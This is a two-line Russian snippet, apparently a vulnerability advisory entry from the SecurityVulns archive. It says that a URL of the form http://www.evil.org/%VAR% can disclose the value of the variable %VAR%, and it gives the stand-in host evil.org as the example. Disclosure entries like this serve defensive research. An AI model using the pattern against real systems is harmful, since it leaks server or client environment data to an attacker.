При использовании URL типа http://www.evil.org/%VAR% можно получить значение переменной %VAR%.
vulners.com/securityvulns/securityvulns:doc:1482